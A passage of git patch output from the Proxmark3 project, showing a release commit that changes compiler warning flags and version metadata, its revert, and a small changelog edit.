set_property(TARGET pm3rrg_rdv4_hardnested_avx512 PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -116,7 +116,7 @@ elseif ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST ARM64_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -Werror -O3) + target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_hardnested_neon PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_hardnested_neon PRIVATE @@ -134,7 +134,7 @@ elseif ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST ARM32_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -Werror -O3) + target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -O3) target_compile_options(pm3rrg_rdv4_hardnested_neon BEFORE PRIVATE -mfpu=neon) set_property(TARGET pm3rrg_rdv4_hardnested_neon PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -155,7 +155,7 @@ add_library(pm3rrg_rdv4_hardnested STATIC hardnested/hardnested_bruteforce.c $ ${SIMD_TARGETS}) -target_compile_options(pm3rrg_rdv4_hardnested PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_hardnested PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_hardnested PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_hardnested PRIVATE ../../common diff --git a/client/deps/id48lib.cmake b/client/deps/id48lib.cmake index 47205d494..fa57d7855 100644 --- a/client/deps/id48lib.cmake +++ b/client/deps/id48lib.cmake @@ -3,7 +3,7 @@ add_library(pm3rrg_rdv4_id48 STATIC id48/id48_generator.c id48/id48_recover.c ) -target_compile_options( pm3rrg_rdv4_id48 PRIVATE -Wpedantic -Wall -Werror -O3 -Wno-unknown-pragmas -Wno-inline -Wno-unused-function -DID48_NO_STDIO) +target_compile_options( pm3rrg_rdv4_id48 PRIVATE -Wpedantic -Wall -O3 -Wno-unknown-pragmas -Wno-inline -Wno-unused-function -DID48_NO_STDIO) target_include_directories(pm3rrg_rdv4_id48 PRIVATE id48) target_include_directories(pm3rrg_rdv4_id48 INTERFACE id48) set_property(TARGET pm3rrg_rdv4_id48 PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/jansson.cmake b/client/deps/jansson.cmake index c91a47047..42c701d5e 100644 --- a/client/deps/jansson.cmake +++ b/client/deps/jansson.cmake @@ -14,5 +14,5 @@ add_library(pm3rrg_rdv4_jansson STATIC target_compile_definitions(pm3rrg_rdv4_jansson PRIVATE HAVE_STDINT_H) target_include_directories(pm3rrg_rdv4_jansson INTERFACE jansson) -target_compile_options(pm3rrg_rdv4_jansson PRIVATE -Wall -Werror -Wno-unused-function -O3) +target_compile_options(pm3rrg_rdv4_jansson PRIVATE -Wall -Wno-unused-function -O3) set_property(TARGET pm3rrg_rdv4_jansson PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/lua.cmake b/client/deps/lua.cmake index 12870342e..5cf33d724 100644 --- a/client/deps/lua.cmake +++ b/client/deps/lua.cmake @@ -52,5 +52,5 @@ if (NOT MINGW) endif (NOT MINGW) target_include_directories(pm3rrg_rdv4_lua INTERFACE liblua) -target_compile_options(pm3rrg_rdv4_lua PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_lua PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_lua PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/mbedtls.cmake b/client/deps/mbedtls.cmake index c1ab8d880..9d06b1c96 100644 --- a/client/deps/mbedtls.cmake +++ b/client/deps/mbedtls.cmake @@ -48,5 +48,5 @@ add_library(pm3rrg_rdv4_mbedtls STATIC target_include_directories(pm3rrg_rdv4_mbedtls PRIVATE ../../common) target_include_directories(pm3rrg_rdv4_mbedtls INTERFACE ../../common/mbedtls) -target_compile_options(pm3rrg_rdv4_mbedtls PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_mbedtls PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_mbedtls PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/reveng.cmake b/client/deps/reveng.cmake index d7e3cfd8a..1040730f1 100644 --- a/client/deps/reveng.cmake +++ b/client/deps/reveng.cmake @@ -13,5 +13,5 @@ target_include_directories(pm3rrg_rdv4_reveng PRIVATE ../src ../../include) target_include_directories(pm3rrg_rdv4_reveng INTERFACE reveng) -target_compile_options(pm3rrg_rdv4_reveng PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_reveng PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_reveng PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/tinycbor.cmake b/client/deps/tinycbor.cmake index 5a6abda25..c74618149 100644 --- a/client/deps/tinycbor.cmake +++ b/client/deps/tinycbor.cmake @@ -11,5 +11,5 @@ add_library(pm3rrg_rdv4_tinycbor STATIC target_include_directories(pm3rrg_rdv4_tinycbor INTERFACE tinycbor) # Strange errors on Mingw when compiling with -O3 -target_compile_options(pm3rrg_rdv4_tinycbor PRIVATE -Wall -Werror -O2) +target_compile_options(pm3rrg_rdv4_tinycbor PRIVATE -Wall -O2) set_property(TARGET pm3rrg_rdv4_tinycbor PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/whereami.cmake b/client/deps/whereami.cmake index d2d6a5b2a..721873066 100644 --- a/client/deps/whereami.cmake +++ b/client/deps/whereami.cmake @@ -2,5 +2,5 @@ add_library(pm3rrg_rdv4_whereami STATIC whereami/whereami.c) target_compile_definitions(pm3rrg_rdv4_whereami PRIVATE WAI_PM3_TUNED) target_include_directories(pm3rrg_rdv4_whereami INTERFACE whereami) -target_compile_options(pm3rrg_rdv4_whereami PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_whereami PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_whereami PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/experimental_lib/CMakeLists.txt b/client/experimental_lib/CMakeLists.txt index 2b665414a..183e993aa 100644 --- a/client/experimental_lib/CMakeLists.txt +++ b/client/experimental_lib/CMakeLists.txt @@ -427,7 +427,7 @@ set (TARGET_SOURCES add_custom_command( OUTPUT ${CMAKE_BINARY_DIR}/version_pm3.c - COMMAND sh ${PM3_ROOT}/tools/mkversion.sh ${CMAKE_BINARY_DIR}/version_pm3.c || ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c + COMMAND ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c DEPENDS ${PM3_ROOT}/common/default_version_pm3.c ) diff --git a/client/src/proxmark3.c b/client/src/proxmark3.c index 54b05670a..340f08765 100644 --- a/client/src/proxmark3.c +++ b/client/src/proxmark3.c @@ -49,7 +49,7 @@ static int mainret = PM3_ESOFT; #ifndef LIBPM3 #define BANNERMSG1 "" #define BANNERMSG2 " [ :coffee: ]" -#define BANNERMSG3 "" +#define BANNERMSG3 "Release v4.18589 - Aurora" typedef enum LogoMode { UTF8, ANSI, ASCII } LogoMode; diff --git a/common/default_version_pm3.c b/common/default_version_pm3.c index d93a7ef15..349a573de 100644 --- a/common/default_version_pm3.c +++ b/common/default_version_pm3.c @@ -1,20 +1,5 @@ -//----------------------------------------------------------------------------- -// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. -// -// This program is free software: you can redistribute it and/or modify -// it under the terms of the GNU General Public License as published by -// the Free Software Foundation, either version 3 of the License, or -// (at your option) any later version. -// -// This program is distributed in the hope that it will be useful, -// but WITHOUT ANY WARRANTY; without even the implied warranty of -// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -// GNU General Public License for more details. -// -// See LICENSE.txt for the text of the license. -//----------------------------------------------------------------------------- #include "common.h" -/* This is the default version_pm3.c file that Makefile.common falls back to if sh is not available */ +/* Generated file, do not edit */ #ifndef ON_DEVICE #define SECTVERSINFO #else @@ -23,10 +8,10 @@ const struct version_information_t SECTVERSINFO g_version_information = { VERSION_INFORMATION_MAGIC, - 1, /* version 1 */ - 0, /* version information not present */ - 2, /* cleanliness couldn't be determined */ - "Iceman/master/unknown", - "1970-01-01 00:00:00", - "no sha256" + 1, + 1, + 2, + "Iceman/master/v4.18589", + "2024-05-28 10:36:31", + "669923317" }; diff --git a/common_arm/Makefile.common b/common_arm/Makefile.common index e8e574112..a845963b2 100644 --- a/common_arm/Makefile.common +++ b/common_arm/Makefile.common @@ -49,7 +49,7 @@ VPATH = . ../common_arm ../common ../common/crapto1 ../common/mbedtls ../common/ INCLUDES = ../include/proxmark3_arm.h ../include/at91sam7s512.h ../include/config_gpio.h ../include/pm3_cmd.h ARMCFLAGS = -mthumb-interwork -fno-builtin -DEFCFLAGS = -Wall -Werror -Os -pedantic -fstrict-aliasing -pipe +DEFCFLAGS = -Wall -Os -pedantic -fstrict-aliasing -pipe # Some more warnings we want as errors: DEFCFLAGS += -Wbad-function-cast -Wchar-subscripts -Wundef -Wunused -Wuninitialized -Wpointer-arith -Wformat -Wformat-security -Winit-self -Wmissing-include-dirs -Wnested-externs -Wempty-body -Wignored-qualifiers -Wmissing-field-initializers -Wtype-limits From 7329dcd3bf146e75e6a1e16545e9088eae5745fb Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:36:32 +0200 Subject: [PATCH 024/112] Revert "Release v4.18589 - Aurora" This reverts commit aceed281e83ed595b4fafa59fdea68ef477c4549. --- Makefile.defs | 4 ++-- armsrc/Makefile | 2 +- bootrom/Makefile | 2 +- client/CMakeLists.txt | 4 ++-- client/Makefile | 4 ++-- client/deps/amiibo.cmake | 2 +- client/deps/cliparser.cmake | 2 +- client/deps/hardnested.cmake | 18 ++++++++-------- client/deps/id48lib.cmake | 2 +- client/deps/jansson.cmake | 2 +- client/deps/lua.cmake | 2 +- client/deps/mbedtls.cmake | 2 +- client/deps/reveng.cmake | 2 +- client/deps/tinycbor.cmake | 2 +- client/deps/whereami.cmake | 2 +- client/experimental_lib/CMakeLists.txt | 2 +- client/src/proxmark3.c | 2 +- common/default_version_pm3.c | 29 +++++++++++++++++++------- common_arm/Makefile.common | 2 +- 19 files changed, 51 insertions(+), 36 deletions(-) diff --git a/Makefile.defs b/Makefile.defs index aadb1a98b..1ef2aa09d 100644 --- a/Makefile.defs +++ b/Makefile.defs @@ -112,8 +112,8 @@ ifeq ($(DEBUG),1) DEFCFLAGS = -g -O0 -fstrict-aliasing -pipe DEFLDFLAGS = else - DEFCXXFLAGS = -Wall -O3 -pipe - DEFCFLAGS = -Wall -O3 -fstrict-aliasing -pipe + DEFCXXFLAGS = -Wall -Werror -O3 -pipe + DEFCFLAGS = -Wall -Werror -O3 -fstrict-aliasing -pipe DEFLDFLAGS = endif diff --git a/armsrc/Makefile b/armsrc/Makefile index b9b101396..2f27534ef 100644 --- a/armsrc/Makefile +++ b/armsrc/Makefile @@ -185,7 +185,7 @@ showinfo: # version_pm3.c should be checked on every time fullimage.stage1.elf should be remade version_pm3.c: default_version_pm3.c $(OBJDIR)/fpga_version_info.o $(OBJDIR)/fpga_all.o $(THUMBOBJ) $(ARMOBJ) .FORCE $(info [-] CHECK $@) - $(Q)$(CP) $< $@ + $(Q)$(SH) ../tools/mkversion.sh $@ || $(CP) $< $@ fpga_version_info.c: $(FPGA_BITSTREAMS) $(FPGA_COMPRESSOR) $(info [-] GEN $@) diff --git a/bootrom/Makefile b/bootrom/Makefile index 86c785cd1..b6825530d 100644 --- a/bootrom/Makefile +++ b/bootrom/Makefile @@ -56,7 +56,7 @@ OBJS = $(OBJDIR)/bootrom.s19 # version_pm3.c should be checked on every compilation version_pm3.c: default_version_pm3.c .FORCE $(info [=] CHECK $@) - $(Q)$(CP) $< $@ + $(Q)$(SH) ../tools/mkversion.sh $@ || $(CP) $< $@ all: showinfo $(OBJS) diff --git a/client/CMakeLists.txt b/client/CMakeLists.txt index c17cf32b6..4169b8b57 100644 --- a/client/CMakeLists.txt +++ b/client/CMakeLists.txt @@ -426,7 +426,7 @@ set (TARGET_SOURCES add_custom_command( OUTPUT ${CMAKE_BINARY_DIR}/version_pm3.c - COMMAND ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c + COMMAND sh ${PM3_ROOT}/tools/mkversion.sh ${CMAKE_BINARY_DIR}/version_pm3.c || ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c DEPENDS ${PM3_ROOT}/common/default_version_pm3.c ) @@ -684,7 +684,7 @@ add_executable(proxmark3 ${ADDITIONAL_SRC} ) -target_compile_options(proxmark3 PUBLIC -Wall -O3) +target_compile_options(proxmark3 PUBLIC -Wall -Werror -O3) if (EMBED_READLINE) if (NOT SKIPREADLINE EQUAL 1) add_dependencies(proxmark3 ncurses readline) diff --git a/client/Makefile b/client/Makefile index f69467f6b..1b7090f68 100644 --- a/client/Makefile +++ b/client/Makefile @@ -446,7 +446,7 @@ endif PM3CFLAGS += -DHAVE_SNPRINTF -CXXFLAGS ?= -Wall +CXXFLAGS ?= -Wall -Werror CXXFLAGS += $(MYDEFS) $(MYCXXFLAGS) $(MYINCLUDES) PM3CXXFLAGS = $(CXXFLAGS) @@ -977,7 +977,7 @@ src/pm3_pywrap.c: pm3.i # version_pm3.c should be checked on every compilation src/version_pm3.c: default_version_pm3.c .FORCE $(info [=] CHECK $@) - $(Q)$(CP) $< $@ + $(Q)$(SH) ../tools/mkversion.sh $@ || $(CP) $< $@ # easy printing of MAKE VARIABLES print-%: ; @echo $* = $($*) diff --git a/client/deps/amiibo.cmake b/client/deps/amiibo.cmake index 8c524c170..c946c0682 100644 --- a/client/deps/amiibo.cmake +++ b/client/deps/amiibo.cmake @@ -19,7 +19,7 @@ target_link_libraries(pm3rrg_rdv4_amiibo PRIVATE m pm3rrg_rdv4_mbedtls) -target_compile_options(pm3rrg_rdv4_amiibo PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_amiibo PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_amiibo PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_amiibo PRIVATE amiitool diff --git a/client/deps/cliparser.cmake b/client/deps/cliparser.cmake index a85cc2374..fccae33b7 100644 --- a/client/deps/cliparser.cmake +++ b/client/deps/cliparser.cmake @@ -9,5 +9,5 @@ target_include_directories(pm3rrg_rdv4_cliparser PRIVATE ../../include ../src) target_include_directories(pm3rrg_rdv4_cliparser INTERFACE cliparser) -target_compile_options(pm3rrg_rdv4_cliparser PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_cliparser PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_cliparser PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/hardnested.cmake b/client/deps/hardnested.cmake index 468ee4ef2..ec545e2a8 100644 --- a/client/deps/hardnested.cmake +++ b/client/deps/hardnested.cmake @@ -2,7 +2,7 @@ add_library(pm3rrg_rdv4_hardnested_nosimd OBJECT hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) -target_compile_options(pm3rrg_rdv4_hardnested_nosimd PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_hardnested_nosimd PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_hardnested_nosimd PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_hardnested_nosimd PRIVATE @@ -32,7 +32,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_mmx PRIVATE -Wall -O3) + target_compile_options(pm3rrg_rdv4_hardnested_mmx PRIVATE -Wall -Werror -O3) target_compile_options(pm3rrg_rdv4_hardnested_mmx BEFORE PRIVATE -mmmx -mno-sse2 -mno-avx -mno-avx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_mmx PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -47,7 +47,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_sse2 PRIVATE -Wall -O3) + target_compile_options(pm3rrg_rdv4_hardnested_sse2 PRIVATE -Wall -Werror -O3) target_compile_options(pm3rrg_rdv4_hardnested_sse2 BEFORE PRIVATE -mmmx -msse2 -mno-avx -mno-avx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_sse2 PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -62,7 +62,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_avx PRIVATE -Wall -O3) + target_compile_options(pm3rrg_rdv4_hardnested_avx PRIVATE -Wall -Werror -O3) target_compile_options(pm3rrg_rdv4_hardnested_avx BEFORE PRIVATE -mmmx -msse2 -mavx -mno-avx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_avx PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -77,7 +77,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_avx2 PRIVATE -Wall -O3) + target_compile_options(pm3rrg_rdv4_hardnested_avx2 PRIVATE -Wall -Werror -O3) target_compile_options(pm3rrg_rdv4_hardnested_avx2 BEFORE PRIVATE -mmmx -msse2 -mavx -mavx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_avx2 PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -92,7 +92,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_avx512 PRIVATE -Wall -O3) + target_compile_options(pm3rrg_rdv4_hardnested_avx512 PRIVATE -Wall -Werror -O3) target_compile_options(pm3rrg_rdv4_hardnested_avx512 BEFORE PRIVATE -mmmx -msse2 -mavx -mavx2 -mavx512f) set_property(TARGET pm3rrg_rdv4_hardnested_avx512 PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -116,7 +116,7 @@ elseif ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST ARM64_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -O3) + target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_hardnested_neon PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_hardnested_neon PRIVATE @@ -134,7 +134,7 @@ elseif ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST ARM32_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -O3) + target_compile_options(pm3rrg_rdv4_hardnested_neon PRIVATE -Wall -Werror -O3) target_compile_options(pm3rrg_rdv4_hardnested_neon BEFORE PRIVATE -mfpu=neon) set_property(TARGET pm3rrg_rdv4_hardnested_neon PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -155,7 +155,7 @@ add_library(pm3rrg_rdv4_hardnested STATIC hardnested/hardnested_bruteforce.c $ ${SIMD_TARGETS}) -target_compile_options(pm3rrg_rdv4_hardnested PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_hardnested PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_hardnested PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_hardnested PRIVATE ../../common diff --git a/client/deps/id48lib.cmake b/client/deps/id48lib.cmake index fa57d7855..47205d494 100644 --- a/client/deps/id48lib.cmake +++ b/client/deps/id48lib.cmake @@ -3,7 +3,7 @@ add_library(pm3rrg_rdv4_id48 STATIC id48/id48_generator.c id48/id48_recover.c ) -target_compile_options( pm3rrg_rdv4_id48 PRIVATE -Wpedantic -Wall -O3 -Wno-unknown-pragmas -Wno-inline -Wno-unused-function -DID48_NO_STDIO) +target_compile_options( pm3rrg_rdv4_id48 PRIVATE -Wpedantic -Wall -Werror -O3 -Wno-unknown-pragmas -Wno-inline -Wno-unused-function -DID48_NO_STDIO) target_include_directories(pm3rrg_rdv4_id48 PRIVATE id48) target_include_directories(pm3rrg_rdv4_id48 INTERFACE id48) set_property(TARGET pm3rrg_rdv4_id48 PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/jansson.cmake b/client/deps/jansson.cmake index 42c701d5e..c91a47047 100644 --- a/client/deps/jansson.cmake +++ b/client/deps/jansson.cmake @@ -14,5 +14,5 @@ add_library(pm3rrg_rdv4_jansson STATIC target_compile_definitions(pm3rrg_rdv4_jansson PRIVATE HAVE_STDINT_H) target_include_directories(pm3rrg_rdv4_jansson INTERFACE jansson) -target_compile_options(pm3rrg_rdv4_jansson PRIVATE -Wall -Wno-unused-function -O3) +target_compile_options(pm3rrg_rdv4_jansson PRIVATE -Wall -Werror -Wno-unused-function -O3) set_property(TARGET pm3rrg_rdv4_jansson PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/lua.cmake b/client/deps/lua.cmake index 5cf33d724..12870342e 100644 --- a/client/deps/lua.cmake +++ b/client/deps/lua.cmake @@ -52,5 +52,5 @@ if (NOT MINGW) endif (NOT MINGW) target_include_directories(pm3rrg_rdv4_lua INTERFACE liblua) -target_compile_options(pm3rrg_rdv4_lua PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_lua PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_lua PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/mbedtls.cmake b/client/deps/mbedtls.cmake index 9d06b1c96..c1ab8d880 100644 --- a/client/deps/mbedtls.cmake +++ b/client/deps/mbedtls.cmake @@ -48,5 +48,5 @@ add_library(pm3rrg_rdv4_mbedtls STATIC target_include_directories(pm3rrg_rdv4_mbedtls PRIVATE ../../common) target_include_directories(pm3rrg_rdv4_mbedtls INTERFACE ../../common/mbedtls) -target_compile_options(pm3rrg_rdv4_mbedtls PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_mbedtls PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_mbedtls PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/reveng.cmake b/client/deps/reveng.cmake index 1040730f1..d7e3cfd8a 100644 --- a/client/deps/reveng.cmake +++ b/client/deps/reveng.cmake @@ -13,5 +13,5 @@ target_include_directories(pm3rrg_rdv4_reveng PRIVATE ../src ../../include) target_include_directories(pm3rrg_rdv4_reveng INTERFACE reveng) -target_compile_options(pm3rrg_rdv4_reveng PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_reveng PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_reveng PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/tinycbor.cmake b/client/deps/tinycbor.cmake index c74618149..5a6abda25 100644 --- a/client/deps/tinycbor.cmake +++ b/client/deps/tinycbor.cmake @@ -11,5 +11,5 @@ add_library(pm3rrg_rdv4_tinycbor STATIC target_include_directories(pm3rrg_rdv4_tinycbor INTERFACE tinycbor) # Strange errors on Mingw when compiling with -O3 -target_compile_options(pm3rrg_rdv4_tinycbor PRIVATE -Wall -O2) +target_compile_options(pm3rrg_rdv4_tinycbor PRIVATE -Wall -Werror -O2) set_property(TARGET pm3rrg_rdv4_tinycbor PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/whereami.cmake b/client/deps/whereami.cmake index 721873066..d2d6a5b2a 100644 --- a/client/deps/whereami.cmake +++ b/client/deps/whereami.cmake @@ -2,5 +2,5 @@ add_library(pm3rrg_rdv4_whereami STATIC whereami/whereami.c) target_compile_definitions(pm3rrg_rdv4_whereami PRIVATE WAI_PM3_TUNED) target_include_directories(pm3rrg_rdv4_whereami INTERFACE whereami) -target_compile_options(pm3rrg_rdv4_whereami PRIVATE -Wall -O3) +target_compile_options(pm3rrg_rdv4_whereami PRIVATE -Wall -Werror -O3) set_property(TARGET pm3rrg_rdv4_whereami PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/experimental_lib/CMakeLists.txt b/client/experimental_lib/CMakeLists.txt index 183e993aa..2b665414a 100644 --- a/client/experimental_lib/CMakeLists.txt +++ b/client/experimental_lib/CMakeLists.txt @@ -427,7 +427,7 @@ set (TARGET_SOURCES add_custom_command( OUTPUT ${CMAKE_BINARY_DIR}/version_pm3.c - COMMAND ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c + COMMAND sh ${PM3_ROOT}/tools/mkversion.sh ${CMAKE_BINARY_DIR}/version_pm3.c || ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c DEPENDS ${PM3_ROOT}/common/default_version_pm3.c ) diff --git a/client/src/proxmark3.c b/client/src/proxmark3.c index 340f08765..54b05670a 100644 --- a/client/src/proxmark3.c +++ b/client/src/proxmark3.c @@ -49,7 +49,7 @@ static int mainret = PM3_ESOFT; #ifndef LIBPM3 #define BANNERMSG1 "" #define BANNERMSG2 " [ :coffee: ]" -#define BANNERMSG3 "Release v4.18589 - Aurora" +#define BANNERMSG3 "" typedef enum LogoMode { UTF8, ANSI, ASCII } LogoMode; diff --git a/common/default_version_pm3.c b/common/default_version_pm3.c index 349a573de..d93a7ef15 100644 --- a/common/default_version_pm3.c +++ b/common/default_version_pm3.c @@ -1,5 +1,20 @@ +//----------------------------------------------------------------------------- +// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// See LICENSE.txt for the text of the license. +//----------------------------------------------------------------------------- #include "common.h" -/* Generated file, do not edit */ +/* This is the default version_pm3.c file that Makefile.common falls back to if sh is not available */ #ifndef ON_DEVICE #define SECTVERSINFO #else @@ -8,10 +23,10 @@ const struct version_information_t SECTVERSINFO g_version_information = { VERSION_INFORMATION_MAGIC, - 1, - 1, - 2, - "Iceman/master/v4.18589", - "2024-05-28 10:36:31", - "669923317" + 1, /* version 1 */ + 0, /* version information not present */ + 2, /* cleanliness couldn't be determined */ + "Iceman/master/unknown", + "1970-01-01 00:00:00", + "no sha256" }; diff --git a/common_arm/Makefile.common b/common_arm/Makefile.common index a845963b2..e8e574112 100644 --- a/common_arm/Makefile.common +++ b/common_arm/Makefile.common @@ -49,7 +49,7 @@ VPATH = . ../common_arm ../common ../common/crapto1 ../common/mbedtls ../common/ INCLUDES = ../include/proxmark3_arm.h ../include/at91sam7s512.h ../include/config_gpio.h ../include/pm3_cmd.h ARMCFLAGS = -mthumb-interwork -fno-builtin -DEFCFLAGS = -Wall -Os -pedantic -fstrict-aliasing -pipe +DEFCFLAGS = -Wall -Werror -Os -pedantic -fstrict-aliasing -pipe # Some more warnings we want as errors: DEFCFLAGS += -Wbad-function-cast -Wchar-subscripts -Wundef -Wunused -Wuninitialized -Wpointer-arith -Wformat -Wformat-security -Winit-self -Wmissing-include-dirs -Wnested-externs -Wempty-body -Wignored-qualifiers -Wmissing-field-initializers -Wtype-limits From f6ccda074ca6d18296c9e61e92c3b5b3c45aa37c Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:41:30 +0200 Subject: [PATCH 025/112] text --- CHANGELOG.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 321b73266..c03f3a4d5 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,7 +4,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac ## [unreleased][unreleased] -## [Aurora][2024-05-28] +## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) - Changed `mem spiffs tree` - adapted to bigbuff and show if empty (@iceman1001) - Changed `lf hitag info` - now tries to identify different key fob emulators (@iceman1001) From e377201d72c269083595ec0fca8e3a859e3960a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Benjamin=20M=C3=B8ller?= <37707273+LupusE@users.noreply.github.com> Date: Wed, 29 May 2024 16:50:39 +0200 Subject: [PATCH 026/112] Update 4_Advanced-compilation-parameters.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 